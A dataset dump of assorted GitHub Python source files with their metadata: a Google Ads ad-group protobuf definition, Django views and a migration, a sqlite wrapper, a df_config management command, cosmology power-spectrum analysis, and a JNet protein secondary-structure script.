blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0e8424e290643259e8f4b6854ed2725343d9e5cd | 89c4a43a505df8fdf1f0d7386988c4896c2e631b | /google/ads/googleads/v8/resources/types/ad_group.py | 243d485134ef74e75b402fb5eb6187f67cf4952e | [
"Apache-2.0"
] | permissive | hurricanelennane/google-ads-python | a0a1fed690776a8bb2e81f637eb7eae10fb4992f | 310a488b6fdad9d5beea8fa4b166edce779a2511 | refs/heads/master | 2023-07-04T03:07:53.344466 | 2021-07-16T19:06:36 | 2021-07-16T19:06:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,520 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v8.common.types import custom_parameter
from google.ads.googleads.v8.common.types import (
explorer_auto_optimizer_setting as gagc_explorer_auto_optimizer_setting,
)
from google.ads.googleads.v8.common.types import (
targeting_setting as gagc_targeting_setting,
)
from google.ads.googleads.v8.enums.types import ad_group_ad_rotation_mode
from google.ads.googleads.v8.enums.types import ad_group_status
from google.ads.googleads.v8.enums.types import ad_group_type
from google.ads.googleads.v8.enums.types import asset_field_type
from google.ads.googleads.v8.enums.types import bidding_source
from google.ads.googleads.v8.enums.types import targeting_dimension
__protobuf__ = proto.module(
package="google.ads.googleads.v8.resources",
marshal="google.ads.googleads.v8",
manifest={"AdGroup",},
)
class AdGroup(proto.Message):
r"""An ad group.
Attributes:
resource_name (str):
Immutable. The resource name of the ad group. Ad group
resource names have the form:
``customers/{customer_id}/adGroups/{ad_group_id}``
id (int):
Output only. The ID of the ad group.
name (str):
The name of the ad group.
This field is required and should not be empty
when creating new ad groups.
It must contain fewer than 255 UTF-8 full-width
characters.
It must not contain any null (code point 0x0),
NL line feed (code point 0xA) or carriage return
(code point 0xD) characters.
status (google.ads.googleads.v8.enums.types.AdGroupStatusEnum.AdGroupStatus):
The status of the ad group.
type_ (google.ads.googleads.v8.enums.types.AdGroupTypeEnum.AdGroupType):
Immutable. The type of the ad group.
ad_rotation_mode (google.ads.googleads.v8.enums.types.AdGroupAdRotationModeEnum.AdGroupAdRotationMode):
The ad rotation mode of the ad group.
base_ad_group (str):
Output only. For draft or experiment ad
groups, this field is the resource name of the
base ad group from which this ad group was
created. If a draft or experiment ad group does
not have a base ad group, then this field is
null.
For base ad groups, this field equals the ad
group resource name.
This field is read-only.
tracking_url_template (str):
The URL template for constructing a tracking
URL.
url_custom_parameters (Sequence[google.ads.googleads.v8.common.types.CustomParameter]):
The list of mappings used to substitute custom parameter
tags in a ``tracking_url_template``, ``final_urls``, or
``mobile_final_urls``.
campaign (str):
Immutable. The campaign to which the ad group
belongs.
cpc_bid_micros (int):
The maximum CPC (cost-per-click) bid.
cpm_bid_micros (int):
The maximum CPM (cost-per-thousand viewable
impressions) bid.
target_cpa_micros (int):
The target CPA (cost-per-acquisition).
cpv_bid_micros (int):
Output only. The CPV (cost-per-view) bid.
target_cpm_micros (int):
Average amount in micros that the advertiser
is willing to pay for every thousand times the
ad is shown.
target_roas (float):
The target ROAS (return-on-ad-spend)
override. If the ad group's campaign bidding
strategy is a standard Target ROAS strategy,
then this field overrides the target ROAS
specified in the campaign's bidding strategy.
Otherwise, this value is ignored.
percent_cpc_bid_micros (int):
The percent cpc bid amount, expressed as a fraction of the
advertised price for some good or service. The valid range
for the fraction is [0,1) and the value stored here is
1,000,000 \* [fraction].
explorer_auto_optimizer_setting (google.ads.googleads.v8.common.types.ExplorerAutoOptimizerSetting):
Settings for the Display Campaign Optimizer,
initially termed "Explorer".
display_custom_bid_dimension (google.ads.googleads.v8.enums.types.TargetingDimensionEnum.TargetingDimension):
Allows advertisers to specify a targeting
dimension on which to place absolute bids. This
is only applicable for campaigns that target
only the display network and not search.
final_url_suffix (str):
URL template for appending params to Final
URL.
targeting_setting (google.ads.googleads.v8.common.types.TargetingSetting):
Setting for targeting related features.
effective_target_cpa_micros (int):
Output only. The effective target CPA (cost-
er-acquisition). This field is read-only.
effective_target_cpa_source (google.ads.googleads.v8.enums.types.BiddingSourceEnum.BiddingSource):
Output only. Source of the effective target
CPA. This field is read-only.
effective_target_roas (float):
Output only. The effective target ROAS
(return-on-ad-spend). This field is read-only.
effective_target_roas_source (google.ads.googleads.v8.enums.types.BiddingSourceEnum.BiddingSource):
Output only. Source of the effective target
ROAS. This field is read-only.
labels (Sequence[str]):
Output only. The resource names of labels
attached to this ad group.
excluded_parent_asset_field_types (Sequence[google.ads.googleads.v8.enums.types.AssetFieldTypeEnum.AssetFieldType]):
The asset field types that should be excluded
from this ad group. Asset links with these field
types will not be inherited by this ad group
from the upper levels.
"""
resource_name = proto.Field(proto.STRING, number=1,)
id = proto.Field(proto.INT64, number=34, optional=True,)
name = proto.Field(proto.STRING, number=35, optional=True,)
status = proto.Field(
proto.ENUM,
number=5,
enum=ad_group_status.AdGroupStatusEnum.AdGroupStatus,
)
type_ = proto.Field(
proto.ENUM, number=12, enum=ad_group_type.AdGroupTypeEnum.AdGroupType,
)
ad_rotation_mode = proto.Field(
proto.ENUM,
number=22,
enum=ad_group_ad_rotation_mode.AdGroupAdRotationModeEnum.AdGroupAdRotationMode,
)
base_ad_group = proto.Field(proto.STRING, number=36, optional=True,)
tracking_url_template = proto.Field(proto.STRING, number=37, optional=True,)
url_custom_parameters = proto.RepeatedField(
proto.MESSAGE, number=6, message=custom_parameter.CustomParameter,
)
campaign = proto.Field(proto.STRING, number=38, optional=True,)
cpc_bid_micros = proto.Field(proto.INT64, number=39, optional=True,)
cpm_bid_micros = proto.Field(proto.INT64, number=40, optional=True,)
target_cpa_micros = proto.Field(proto.INT64, number=41, optional=True,)
cpv_bid_micros = proto.Field(proto.INT64, number=42, optional=True,)
target_cpm_micros = proto.Field(proto.INT64, number=43, optional=True,)
target_roas = proto.Field(proto.DOUBLE, number=44, optional=True,)
percent_cpc_bid_micros = proto.Field(proto.INT64, number=45, optional=True,)
explorer_auto_optimizer_setting = proto.Field(
proto.MESSAGE,
number=21,
message=gagc_explorer_auto_optimizer_setting.ExplorerAutoOptimizerSetting,
)
display_custom_bid_dimension = proto.Field(
proto.ENUM,
number=23,
enum=targeting_dimension.TargetingDimensionEnum.TargetingDimension,
)
final_url_suffix = proto.Field(proto.STRING, number=46, optional=True,)
targeting_setting = proto.Field(
proto.MESSAGE,
number=25,
message=gagc_targeting_setting.TargetingSetting,
)
effective_target_cpa_micros = proto.Field(
proto.INT64, number=47, optional=True,
)
effective_target_cpa_source = proto.Field(
proto.ENUM,
number=29,
enum=bidding_source.BiddingSourceEnum.BiddingSource,
)
effective_target_roas = proto.Field(proto.DOUBLE, number=48, optional=True,)
effective_target_roas_source = proto.Field(
proto.ENUM,
number=32,
enum=bidding_source.BiddingSourceEnum.BiddingSource,
)
labels = proto.RepeatedField(proto.STRING, number=49,)
excluded_parent_asset_field_types = proto.RepeatedField(
proto.ENUM,
number=54,
enum=asset_field_type.AssetFieldTypeEnum.AssetFieldType,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"noreply@github.com"
] | noreply@github.com |
66d512673c537674ae11cbee4685d528fd2c159a | f611edb1c5ad13ffeb35ababa400f46453deaaf0 | /task2/second.py | d9e8b2fed32a7432d742a8fe5f203bbed2766a66 | [] | no_license | PavelFilonov/LearningPython | ab38fd5da53e5dd092a1d0c65f2754ec49496ad7 | 43f23764d3b37e9da6e4592434cc4c06f2e3bf8c | refs/heads/master | 2023-07-05T10:27:20.183088 | 2021-08-07T02:36:39 | 2021-08-07T02:36:39 | 393,547,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,582 | py | def solution(matrix):
# 1 - последовательность возрастает, 0 - убывает, -1 - первоначальное значение,
# 2 - не убывает и не возрастает
s = -1
sign = -1
currentRow = len(matrix) - 1
for j in range(0, len(matrix[0])):
for i in range(0, len(matrix)):
if j == len(matrix[0]) - 1 and i == len(matrix) - 1:
continue
if s == -1:
s = isSequence(matrix[currentRow][j], matrix[currentRow + sign][j])
else:
col = j
row = currentRow + sign
if i == len(matrix) - 1:
row = currentRow
col = j + 1
if s != isSequence(matrix[currentRow][j], matrix[row][col]) \
and isSequence(matrix[currentRow][j], matrix[row][col]) != 2:
return False
if i != len(matrix) - 1:
currentRow += sign
sign *= -1
return True
def isSequence(firstValue, secondValue):
if secondValue > firstValue:
return 1
elif firstValue > secondValue:
return 0
else:
return 2
example1 = [
[1, 2, 3, 4, 5],
[6, 7, 8, 9, 10],
[11, 12, 13, 14, 15],
[16, 17, 18, 19, 20],
[21, 22, 23, 24, 25]]
example2 = [
[1],
[6],
[11],
[16],
[21]]
example3 = [
[1, 0],
[6, -1],
[11, -2],
[16, -3],
[21, -4]]
print(solution(example1))
print(solution(example2))
print(solution(example3))
| [
"qqq.qqq48@yandex.ru"
] | qqq.qqq48@yandex.ru |
3e428ed45a6453054fba8058c7ff3ad38de20bdc | 94c3f065abe6a1391117327efbad4f7cce0b0978 | /ecommerce_webapp/views.py | 564b16f63e228794a347891904e4e1b52c9dec9a | [] | no_license | ycv005/Ecommerce | 9c9a3a88517d33de657eb441980473b593912ca8 | 09bb27476a529d6c34274fdaf4b6ef38f6b6884b | refs/heads/master | 2022-12-23T05:11:27.428853 | 2020-08-17T12:13:59 | 2020-08-17T12:13:59 | 178,663,902 | 3 | 1 | null | 2022-12-08T09:35:49 | 2019-03-31T08:51:05 | JavaScript | UTF-8 | Python | false | false | 785 | py | from django.shortcuts import HttpResponse
from django.shortcuts import render,redirect
from django.contrib.auth import authenticate, login
from django.contrib.auth.models import User
from .models import ContactForm
def home_page(request):
return render(request,"ecommerce_webapp/home_page.html",context={"title":"This is from the context"})
def contact_page(request):
contact_form = ContactForm(request.POST or None)
# if request.method=="POST":
# print(request.POST)
# print(request.POST.get("fullname"))
if contact_form.is_valid():
print(contact_form.cleaned_data)
return render(request,"ecommerce_webapp/contact_page.html",{"form":contact_form})
def about_page(request):
return render(request,"ecommerce_webapp/about_page.html",{}) | [
"ycverma005@gmail.com"
] | ycverma005@gmail.com |
752e9f1a6a208543137c36cda179ddf64539f177 | b4a0380acd79a21c5596bfa5fac6eb337ef5359a | /build/lib.linux-x86_64-3.8/maskrcnn_benchmark/data/datasets/evaluation/kitchen/__init__.py | 262e29603168969af9a493dd19f6620fd1abb4d8 | [] | no_license | xiaofeng-c/Morphable-Detector | 781104d8a7221eb03c55a67f51f696e46ded4003 | 3e50bb20493c3e0b99d37971e51487124aa08b5b | refs/heads/master | 2023-08-27T20:53:21.606442 | 2021-10-18T22:28:38 | 2021-10-18T22:28:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | import logging
from .kitchen_eval import do_kitchen_evaluation
def kitchen_evaluation(dataset, predictions, output_folder, box_only, **_):
logger = logging.getLogger("maskrcnn_benchmark.inference")
if box_only:
logger.warning("kitchen evaluation doesn't support box_only, ignored.")
logger.info("performing kitchen evaluation, ignored iou_types.")
return do_kitchen_evaluation(
dataset=dataset,
predictions=predictions,
output_folder=output_folder,
logger=logger,
)
| [
"zhaoxiangyun915@gmail.com"
] | zhaoxiangyun915@gmail.com |
8873e1b784b24057a8e64655dca5dc3c4d1f3d87 | 5603625e865a7cfe415c1aae4035a890aeb23864 | /bin/mnu.py | a178061c01bb7c57e4e3d48aa0bfeed54f50e963 | [] | no_license | msyriac/peakaboo | aa3ac1396c2af0862f9c5891a20a08dddd97068b | 8bb8a50262695733b086984f7d89ff4f04187278 | refs/heads/master | 2021-01-21T13:30:31.434801 | 2018-05-16T18:53:34 | 2018-05-16T18:53:34 | 102,130,912 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,997 | py | import numpy as np
from peakaboo import liuSims as ls
import orphics.tools.io as io
import os,sys
import orphics.analysis.flatMaps as fmaps
from mpi4py import MPI
from orphics.analysis.pipeline import mpi_distribute, MPIStats
import orphics.analysis.flatMaps as fmaps
from enlib import enmap, resample
# Get MPI comm
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
numcores = comm.Get_size()
out_dir = os.environ['WWW']+"peakaboo/"
#file_root = "/gpfs01/astro/workarea/msyriac/data/sims/jia/output/jia_recon_"
file_root = lambda mass,ftype,x,ext: "/gpfs01/astro/workarea/msyriac/data/sims/jia/output/"+mass+"_"+ftype+"_experiment_simple_"+str(x).zfill(9)+"."+ext
Ntot = 500
num_each,each_tasks = mpi_distribute(Ntot,numcores)
mpibox = MPIStats(comm,num_each,tag_start=333)
my_tasks = each_tasks[rank]
LCmassless = ls.LiuConvergence(root_dir="/gpfs01/astro/workarea/msyriac/data/sims/jia/cmb/massless/",zstr="1100.00")
LCmassive = ls.LiuConvergence(root_dir="/gpfs01/astro/workarea/msyriac/data/sims/jia/cmb/massive/",zstr="1100.00")
lbin_edges = np.arange(200,3000,100)
for k,i in enumerate(my_tasks):
#massive = enmap.read_map(file_root+"massive_"+str(i).zfill(9)+".fits")
#massless = enmap.read_map(file_root+"massless_"+str(i).zfill(9)+".fits")
massive = enmap.read_map(file_root("massive","kappa_recon",i,"fits"))
massless = enmap.read_map(file_root("massless","kappa_recon",i,"fits"))
if k==0:
qpower = fmaps.QuickPower(massive.modlmap(),lbin_edges)
massive_input = LCmassive.get_kappa(i+1)
massive_input = enmap.ndmap(resample.resample_fft(massive_input,massive.shape),massive.wcs)
massless_input = LCmassless.get_kappa(i+1)
massless_input = enmap.ndmap(resample.resample_fft(massless_input,massless.shape),massless.wcs)
print massive.shape
print massive_input.shape
cents, pauto_massive = qpower.calc(massive)
cents, pauto_massless = qpower.calc(massless)
cents, pcross_massive = qpower.calc(massive,massive_input)
cents, pcross_massless = qpower.calc(massless,massless_input)
cents, pauto_massive_input = qpower.calc(massive_input)
cents, pauto_massless_input = qpower.calc(massless_input)
lcents,massive_rkk = np.loadtxt(file_root("massive","auto_n0_subbed",i,"fits"),unpack=True)
lcents,massless_rkk = np.loadtxt(file_root("massless","auto_n0_subbed",i,"fits"),unpack=True)
mpibox.add_to_stats("massiveAutoN0",massive_rkk)
mpibox.add_to_stats("masslessAutoN0",massless_rkk)
mpibox.add_to_stats("massiveAuto",pauto_massive)
mpibox.add_to_stats("masslessAuto",pauto_massless)
mpibox.add_to_stats("masslessCross",pcross_massless)
mpibox.add_to_stats("massiveCross",pcross_massive)
mpibox.add_to_stats("massiveInput",pauto_massive_input)
mpibox.add_to_stats("masslessInput",pauto_massless_input)
print rank,i
mpibox.get_stats()
if rank==0:
rm = mpibox.stats["massiveAutoN0"]
rm0 = mpibox.stats["masslessAutoN0"]
mauto = mpibox.stats["massiveAuto"]
m0auto = mpibox.stats["masslessAuto"]
m0cross = mpibox.stats["masslessCross"]
mcross = mpibox.stats["massiveCross"]
mauto_input = mpibox.stats["massiveInput"]
m0auto_input = mpibox.stats["masslessInput"]
def camb_pred(nu):
import orphics.tools.cmb as cmb
# camb_cl_prediction
cambRoot = "data/jia_"+nu
theory = cmb.loadTheorySpectraFromCAMB(cambRoot,unlensedEqualsLensed=False,useTotal=False,TCMB = 2.7255e6,lpad=9000)
ellrange = np.arange(2,3000,1)
clkk_camb = theory.gCl("kk",ellrange)
return ellrange,clkk_camb
ellrange,clkk_camb0 = camb_pred("massless")
pl = io.Plotter(scaleY='log',labelX="$\\ell$",labelY="$C_{\ell}$")
pl.addErr(lcents,rm0['mean'],yerr=rm0['errmean'],marker="o")
pl.addErr(cents,m0cross['mean'],yerr=m0cross['errmean'],marker="^")
pl.add(cents,m0auto_input['mean'],marker="x",ls="none")
pl.add(ellrange,clkk_camb0,label="cl camb",color="k")
pl._ax.set_ylim(1.e-9,1.e-6)
pl.done(out_dir+"massless.png")
ellrange,clkk_camb = camb_pred("massive")
pl = io.Plotter(scaleY='log',labelX="$\\ell$",labelY="$C_{\ell}$")
pl.addErr(lcents,rm['mean'],yerr=rm['errmean'],marker="o")
pl.addErr(cents,mcross['mean'],yerr=mcross['errmean'],marker="^")
pl.add(cents,mauto_input['mean'],marker="x",ls="none")
pl.add(ellrange,clkk_camb,label="cl camb",color="k")
pl._ax.set_ylim(1.e-9,1.e-6)
pl.done(out_dir+"massive.png")
pdiff = (clkk_camb-clkk_camb0)*100./clkk_camb0
pl = io.Plotter(labelX="$\\ell$",labelY="$100\\Delta C_{\ell}/C_{\ell}$")
pl.add(lcents,(rm['mean']-rm0['mean'])*100./rm0['mean'],marker="o",ls="none")
pl.add(cents,(mauto_input['mean']-m0auto_input['mean'])*100./m0auto_input['mean'],marker="x",ls="none")
pl.add(ellrange,pdiff,label="cl camb",color="k")
pl.hline()
#pl._ax.set_ylim(-2,1)
pl._ax.set_xlim(500,3000)
pl.done(out_dir+"mnudiff.png")
| [
"mathewsyriac@gmail.com"
] | mathewsyriac@gmail.com |
c93d95df971729dcee51ec911d73f0372fbfad09 | 77c1363118126868499354d0ead05d2815066d14 | /database.py | e9ad43c944538f9b4b0d795f73e94b4ef390f565 | [] | no_license | JDamour/iDBMS-SQLITE3 | f56f2ede1538007a773dba1f7c2ad588eb344d2e | c01c1b3e91caa6dfc720b86822060842c5005ab9 | refs/heads/master | 2021-07-09T15:50:17.857616 | 2017-10-04T15:21:43 | 2017-10-04T15:21:43 | 105,782,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | #!/usr/bin/env python3
import sqlite3
class database:
def __init__(self, **kwargs):
self.filename = kwargs.get('filename')
self.table = kwargs.get('table', 'table_name')
def sql_do(self, sql, *params):
self._db.execute(sql, params)
self._db.commit()
# Insert method allows to insert record in db
def insert(self, row):
self._db.execute('insert into {} (col1, col2, col3, coln) values (?, ?, ?, ?)'.format(self._table), (row['col1'], row['col2'], row['col3'], row['coln']))
self._db.commit()
# Retrieve row data in memory database
def retrieve(self, key):
cursor = self._db.execute('select * from {} where col1 = ?'.format(self._table), (key,))
return dict(cursor.fetchone())
def __iter__(self):
cursor = self._db.execute('select * from {} order by col1'.format(self._table))
for row in cursor:
yield dict(row)
@property
def filename(self): return self._filename
@filename.setter
def filename(self, fn):
self._filename = fn
self._db = sqlite3.connect(fn)
self._db.row_factory = sqlite3.Row
@property
def table(self): return self._table
@table.setter
def table(self, t): self._table = t
@table.deleter
def table(self): self._table = 'table_name'
def close(self):
self._db.close()
del self._filename | [
"mpatswenimanaj@gmail.com"
] | mpatswenimanaj@gmail.com |
30e7ee6e9613f8e3a445ca8013212c82994b3b3a | 5ba25b77a21406e5549435724b2954db1fd90298 | /app/migrations/0003_auto_20200622_2232.py | 8d6b796f2610cc56782b732d66f1b2f3ddeef8a9 | [] | no_license | CodePythonFollow/Django | 66e94673377f1b5afffa605f9cb2e1e42222efdb | 6c3ee68e7766f2225614c17f3b7dab107bb1577f | refs/heads/master | 2022-12-14T05:51:57.312005 | 2020-09-22T01:05:14 | 2020-09-22T01:05:14 | 271,512,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | # Generated by Django 3.0.7 on 2020-06-22 22:32
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0002_grade_strudent'),
]
operations = [
migrations.RenameModel(
old_name='Strudent',
new_name='Student',
),
]
| [
"code1832389863@gmail.com"
] | code1832389863@gmail.com |
70d962dc42ed35c2ff643bbf27a7867dbdb3e1b3 | 786fc7dd46ea4f14266d264ef9cf1b176fff3a62 | /venv/Lib/site-packages/df_config/management/commands/config.py | d5c4a390c0ccb12ef6b604eb702ae2908bbda2bf | [] | no_license | liaxio/StockWeb | 59bb5d9706cf71f3819435018cb87c900451697f | 8cb27be3fa808461cbd6addc58c7a9c6f3230038 | refs/heads/master | 2023-07-04T01:32:17.827892 | 2021-08-03T01:49:12 | 2021-08-03T01:49:12 | 392,148,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,324 | py | # ##############################################################################
# This file is part of df_config #
# #
# Copyright (C) 2020 Matthieu Gallet <github@19pouces.net> #
# All Rights Reserved #
# #
# You may use, distribute and modify this code under the #
# terms of the (BSD-like) CeCILL-B license. #
# #
# You should have received a copy of the CeCILL-B license with #
# this file. If not, please visit: #
# https://cecill.info/licences/Licence_CeCILL-B_V1-en.txt (English) #
# or https://cecill.info/licences/Licence_CeCILL-B_V1-fr.txt (French) #
# #
# ##############################################################################
import io
from argparse import ArgumentParser
from django.core.management import BaseCommand
from django.core.management.base import OutputWrapper
from django.core.management.color import no_style
from django.template.loader import render_to_string
from django.utils.translation import gettext as _
from df_config import __version__ as version
from df_config.config.base import merger
from df_config.utils import guess_version, remove_arguments_from_help
__author__ = "Matthieu Gallet"
from df_config.config.values_providers import (
EnvironmentConfigProvider,
IniConfigProvider,
)
class Command(BaseCommand):
help = (
"show the current configuration."
'Can display as python file ("config python") or as .ini file ("config ini"). Use -v 2 to display more info.'
)
requires_system_checks = False
options = {
"python": "display the current config as Python module",
"ini": "display the current config as .ini file",
"env": "display the current config as environment variables",
}
def add_arguments(self, parser: ArgumentParser):
parser.add_argument(
"action",
default="show",
choices=self.options,
help=",\n".join(['"%s": %s' % x for x in self.options.items()]),
)
parser.add_argument(
"--filename", default=None, help="write output to this file"
)
remove_arguments_from_help(
parser, {"--settings", "--traceback", "--pythonpath"}
)
def handle(self, *args, **options):
try:
self.handle_head(**options)
except BrokenPipeError:
pass
def handle_head(self, **options):
action = options["action"]
verbosity = options["verbosity"]
filename = options["filename"]
fd = None
if filename:
fd = io.StringIO()
self.stdout = OutputWrapper(fd)
self.style = no_style()
if action == "python":
self.show_python_config(verbosity)
elif action == "ini":
self.show_ini_config(verbosity)
elif action == "env":
self.show_env_config(verbosity)
if filename and action in {"python", "env"}:
content = fd.getvalue()
# noinspection PyBroadException
if action == "python":
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import black
mode = black.FileMode()
# noinspection PyArgumentList
content = black.format_file_contents(content, fast=False, mode=mode)
except Exception:
pass
with open(filename, "w") as dst_fd:
dst_fd.write(content)
def show_external_config(self, config):
content = render_to_string(config, merger.settings)
self.stdout.write(content)
def show_ini_config(self, verbosity):
if verbosity >= 2:
self.stdout.write(self.style.SUCCESS("# read configuration files:"))
for provider in merger.providers:
if not isinstance(provider, IniConfigProvider):
continue
elif provider.is_valid():
self.stdout.write(
self.style.SUCCESS(' # - %s "%s"' % (provider.name, provider))
)
elif verbosity >= 2:
self.stdout.write(
self.style.ERROR(
' # - %s "%s" (not found)' % (provider.name, provider)
)
)
provider = IniConfigProvider()
merger.write_provider(provider, include_doc=verbosity >= 2)
self.stdout.write(provider.to_str())
def show_env_config(self, verbosity):
prefix = None
for provider in merger.providers:
if not isinstance(provider, EnvironmentConfigProvider):
continue
prefix = provider.prefix
if not prefix:
self.stderr.write("Environment variables are not used•")
return
if verbosity >= 2:
self.stdout.write(self.style.SUCCESS("# read environment variables:"))
provider = EnvironmentConfigProvider(prefix)
merger.write_provider(provider, include_doc=verbosity >= 2)
self.stdout.write(provider.to_str())
def show_python_config(self, verbosity):
self.stdout.write(self.style.SUCCESS("# " + "-" * 80))
self.stdout.write(
self.style.SUCCESS(
_("# df_config version %(version)s") % {"version": version}
)
)
self.stdout.write(
self.style.SUCCESS(
_("# %(project)s version %(version)s")
% {
"version": guess_version(merger.settings),
"project": merger.settings["DF_PROJECT_NAME"],
}
)
)
self.stdout.write(self.style.SUCCESS("# Configuration providers:"))
for provider in merger.providers:
if provider.is_valid():
self.stdout.write(
self.style.SUCCESS('# - %s "%s"' % (provider.name, provider))
)
elif verbosity > 1:
self.stdout.write(
self.style.ERROR(
'# - %s "%s" (not found)' % (provider.name, provider)
)
)
self.stdout.write(self.style.SUCCESS("# " + "-" * 80))
setting_names = list(merger.raw_settings)
setting_names.sort()
# first, compute all imports to do
imports = {}
def add_import(val):
if not isinstance(val, type):
val = val.__class__
if val.__module__ != "builtins":
imports.setdefault(val.__module__, set()).add(val.__name__)
for setting_name in setting_names:
if setting_name not in merger.settings:
continue
value = merger.settings[setting_name]
add_import(value)
if imports:
self.stdout.write("\n")
for module_name in sorted(imports):
objects = ", ".join(sorted(imports[module_name]))
self.stdout.write(
self.style.WARNING("from %s import %s" % (module_name, objects))
)
self.stdout.write("\n")
for setting_name in setting_names:
if setting_name not in merger.settings:
continue
value = merger.settings[setting_name]
self.stdout.write(self.style.SUCCESS("%s = %r" % (setting_name, value)))
if verbosity <= 1:
continue
for provider_name, raw_value in merger.raw_settings[setting_name].items():
self.stdout.write(
self.style.WARNING(
" # %s -> %r" % (provider_name or "built-in", raw_value)
)
)
| [
"sanjidafirdaws@gmail.com"
] | sanjidafirdaws@gmail.com |
52fe5c0ff1bb7e21c43186b82e52b142647c0566 | 83ed1e2f176133c03a5f6dfa504b8df15ae71efb | /python/secondary/jnet/jnet.py | d29d5ce53337781076ea7ea61b55aca71ca18040 | [] | no_license | jmborr/code | 319db14f28e1dea27f9fc703be629f171e6bd95f | 32720b57699bf01803367566cdc5fff2b6bce810 | refs/heads/master | 2022-03-09T16:11:07.455402 | 2019-10-28T15:03:01 | 2019-10-28T15:03:01 | 23,627,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,652 | py | #!/usr/bin/python
import os,sys,re
from jobs.job import pastry
from inputArgs.inputArgs import inpHand
from utilities.small_utilities import Bye,junkName
from utilities.codedir import codedir
from seq.blastManager import blastRun
from seq.fastaManager import importFastaEntry
from seq.msa import gen_msa
from seq.letters import one2three
#create frequency file
def createFreqFile(seq,msa):
'''
seq: query sequence
msa: multiple sequence alignment in a list, in the style of 3590
and e10. msa does not contain the query sequence, and each
template sequence is a list item
'''
aas='ARNDCQEGHILKMFPSTWYV' #amino acid order to output, assumed by jnet
freq=[] #freq[i][j] 0<i<len(seq), 0<j<19
N=len(seq)
for i in range(N): freq.append([0]*20) #initialize
for i in range(N): #add amino acids of query sequence to the frequency table
m=aas.find(seq[i]) #return position in aas corresponding to amino acid seq[i]
if m<0:continue #seq[i] character not found in aas (like "X" or "-")
freq[i][m]+=1
for seq2 in msa: #do same for sequences in the alignment
for i in range(N):
m=aas.find(seq2[i]) #return position in aas corresponding to amino acid seq[i]
if m<0:continue #seq[i] character not found in aas
freq[i][m]+=1
blastffreq=junkName()+'.jnetfreq'
out=open(blastffreq,'w')
for i in range(N):
line='' ; m=0
for j in range(20):m+=freq[i][j] #total number of counts for amino acid at position "i"
for j in range(20):
freq[i][j]=round( (10.0*freq[i][j])/m ) #rounded to nearest integer
line+='%3d'%(freq[i][j])
out.write(line+'\n') #write amino acid frequencies for amino acid at position "i"
out.close()
return blastffreq
#########################################################
# SCRIPT EXECUTION STARTS HERE
#########################################################
inpHand('Usage: inprosp.py [options]',
' -a _RA_fastaf sequence file in fasta format',
' -b _A_blasttarf tarred blast output (contains xxxxx.blast,xxxxx.pssm). If not provided, jnet.py will do a psiblast run',
' -c _A_outf output file name (def: ./seq.dat)',
).parse(locals(),sys.argv)
currd=os.getcwd() #current directory
if not outf: outf=currd+'/seq.dat' #output file
workd=currd+'/'+junkName() ;os.system('/bin/mkdir -p '+workd) ; os.chdir(workd) #temp directory
header,seq=importFastaEntry(open(fastaf,'r'))
pastry('/bin/cp '+fastaf+' .') ;fastaf=os.path.basename(fastaf)
#Retrieve/create psiblast outputs
if blasttarf:#we passed a *.tar file containing psiblast report and pssm file
blastOuts={'outf':'', 'blast':'', 'chk':'', 'fasta':fastaf, 'pssm':''}
os.system('tar xf '+blasttarf)
blastOuts['blast']=os.popen('ls -1 *.blast').readline().strip() #get name of blast report
blastOuts['pssm']=os.popen('ls -1 *pssm.').readline().strip() #get name of pssm file
else: blastOuts=blastRun(fastaf) #run blast with default options
#create multiple sequence alignment projected to the query sequence (3590 or e10 style)
msa=gen_msa(seq,header,Eco=0.0001,maxId=0.85,minId=0.10,red=0.75,blastOuts=blastOuts)['alignments']
#find frequency table from msa, and output to "freq" file. I did this
#function because PSIBLAST has evolved and the perl script "getfreq"
#provided in the jnet distro does not work. I could use newer script
#"parse_psi -freq" but it requires a psiblast report obtained with
#blastpgp -m 6, instead of blastpgp -m 0. I don't want to run PSIBLAST
#twice and running with -m 6 gives some humongously-sized reports
blastffreq=createFreqFile(seq,msa)
#remove too short sequences, thenk keep only first M sequences
msa2=[] ; N=len(seq) ; Lhalf=N/2
for seqgapped in msa:
sequngapped=seqgapped.replace('-','')
if len(sequngapped) > Lhalf: msa2.append(sequngapped)
M=int(1000*200/N) #maximum number of sequences to use
msa=msa2[0:M] #reclaim memory space by liberating the gapped sequences list
#output alignment as suitable use for clustalw
rootname=junkName()
